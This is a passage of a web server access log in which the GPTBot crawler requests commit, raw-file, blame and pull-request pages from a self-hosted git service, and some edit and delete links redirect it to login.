GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:38:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?project=-1&state=closed&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?project=-1&state=all&type=all" +[17/Feb/2026:17:38:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/48e58ba35a3d0cdc46729773d610323f6cca6b3a?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 19947] [Gzip 4.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2?files=git%20%ec%84%9c%eb%b2%84%20%ec%82%ac%ec%9a%a9%eb%b2%95%20%eb%8c%80%ed%99%94%20%eb%b3%b4%ea%b4%80%2fgit%20sever%20%ea%b0%9c%ec%84%a4%20%ea%b4%80%eb%a0%a8%20%eb%8c%80%ed%99%94.md" [Client 74.7.227.38] [Length 20707] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/git%20%EC%84%9C%EB%B2%84%20%EC%82%AC%EC%9A%A9%EB%B2%95%20%EB%8C%80%ED%99%94%20%EB%B3%B4%EA%B4%80/git%20sever%20%EA%B0%9C%EC%84%A4%20%EA%B4%80%EB%A0%A8%20%EB%8C%80%ED%99%94.md" +[17/Feb/2026:17:38:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=leastcomment&state=open&type=all" [Client 74.7.227.38] [Length 10011] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=open&type=all" +[17/Feb/2026:17:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=1&labels=0&sort=leastcomment&state=closed&type=all" [Client 74.7.227.38] [Length 10036] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28none%29&labels=0&sort=leastcomment&state=closed&type=all" +[17/Feb/2026:17:38:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fwatchdog.py" [Client 74.7.227.38] [Length 31121] [Gzip 7.99] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:38:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584?files=PostgresMonitor%2fReadMe.txt" [Client 74.7.227.38] [Length 19724] [Gzip 4.32] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/9d6e7f0d3106a64cce13b59d4e9106978f69e584/PostgresMonitor/ReadMe.txt" +[17/Feb/2026:17:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fBuildTip.txt" [Client 74.7.227.38] [Length 17733] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/BuildTip.txt" +[17/Feb/2026:17:39:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83?files=PostgresMonitor%2fwatchdog.py" [Client 74.7.227.38] [Length 30137] [Gzip 6.69] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/4329e0f9218f6c9a721153ce90e89046f0dcbb83/PostgresMonitor/watchdog.py" +[17/Feb/2026:17:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/metadata.json?display=rendered" [Client 74.7.227.38] [Length 11125] [Gzip 3.02] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/metadata.json" +[17/Feb/2026:17:39:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt?display=source" [Client 74.7.227.38] [Length 11651] [Gzip 3.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/requirements.txt" +[17/Feb/2026:17:39:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md?display=source" [Client 74.7.227.38] [Length 18841] [Gzip 4.13] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/branch/main/asset_pilot_docker/updateRecord.md" +[17/Feb/2026:17:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 38582] [Gzip 9.61] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html" +[17/Feb/2026:17:39:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10031] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 10028] [Gzip 3.58] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/pulls?assignee=%28any%29&labels=0&milestone=-1&project=-1&state=all&type=all" +[17/Feb/2026:17:39:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11207] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:17:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 11205] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:17:39:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 11206] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs" +[17/Feb/2026:17:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp?display=rendered" [Client 74.7.227.38] [Length 11029] [Gzip 3.06] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/include/codec.hpp" +[17/Feb/2026:17:39:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp?display=source" [Client 74.7.227.38] [Length 16641] [Gzip 6.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/8d46844ad0dee496f6e51052dc6f6f06f211c977/C++Project/industrial-comm/cpp/src/controller.cpp" +[17/Feb/2026:17:39:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 24126] [Gzip 4.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project" +[17/Feb/2026:17:39:07 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresWatchdog/.vscode/c_cpp_properties.json" +[17/Feb/2026:17:39:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/branch/main/html/README.md?display=source" [Client 74.7.227.38] [Length 11971] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/html/README.md" +[17/Feb/2026:17:39:08 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_delete/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" +[17/Feb/2026:17:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_delete/main/.Backup/html/index.html" +[17/Feb/2026:17:39:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/branch/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 55309] [Gzip 13.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" +[17/Feb/2026:17:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/branch/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 57051] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" +[17/Feb/2026:17:39:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 9875] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/branch/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 10036] [Gzip 3.18] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" +[17/Feb/2026:17:39:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/rss/branch/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 1352] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/branch/main/.Backup/html/index.html" +[17/Feb/2026:17:39:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 3636] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 3141] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:39:13 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_edit/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" +[17/Feb/2026:17:39:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_edit/main/C++Project/controller-cpp2.md" +[17/Feb/2026:17:39:14 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" +[17/Feb/2026:17:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/C++Project/controller-cpp2.md" +[17/Feb/2026:17:39:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 9854] [Gzip 2.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" +[17/Feb/2026:17:39:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/blame/branch/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 71663] [Gzip 21.40] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" +[17/Feb/2026:17:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/C++Project/controller-cpp2.md" +[17/Feb/2026:17:39:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 9873] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/raw/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 22899] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:39:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" [Client 74.7.227.38] [Length 1003] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod03_ctypes.pyc" +[17/Feb/2026:17:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" [Client 74.7.227.38] [Length 1005] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod01_archive.pyc" +[17/Feb/2026:17:39:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/rss/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 1009] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:39:19 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:39:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_delete/main/PostgresMonitor/build/PostgresWatchdog/localpycs/pyimod02_importers.pyc" +[17/Feb/2026:17:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2f3.31.10%2fCompilerIdCXX%2fCMakeCXXCompilerId.cpp" [Client 74.7.227.38] [Length 53585] [Gzip 12.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/c8dad27dda1488de178617d5b12c7f1dcbc93746/C++Project/TestProject/build/CMakeFiles/3.31.10/CompilerIdCXX/CMakeCXXCompilerId.cpp" +[17/Feb/2026:17:39:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fcompiler_depend.make" [Client 74.7.227.38] [Length 40311] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/83e7d939e386dd9b236553115441a2075fc8fe7f/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.make" +[17/Feb/2026:17:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2fTestProject%2fbuild%2fCMakeFiles%2fTestApp.dir%2fcompiler_depend.internal" [Client 74.7.227.38] [Length 30677] [Gzip 7.24] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.internal" +[17/Feb/2026:17:39:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/controller-cpp2.md" +[17/Feb/2026:17:39:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/C++Project/controller-cpp2.md" +[17/Feb/2026:17:39:22 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/C++Project/controller-cpp2.md" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/blame/branch/main/C++Project/controller-cpp2.md" +[17/Feb/2026:17:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/C++Project/controller-cpp2.md" +[17/Feb/2026:17:39:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/pulls?sort=oldest&state=all&type=all" [Client 74.7.227.38] [Length 9941] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/pulls?sort=mostcomment&state=all&type=all" +[17/Feb/2026:17:39:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr 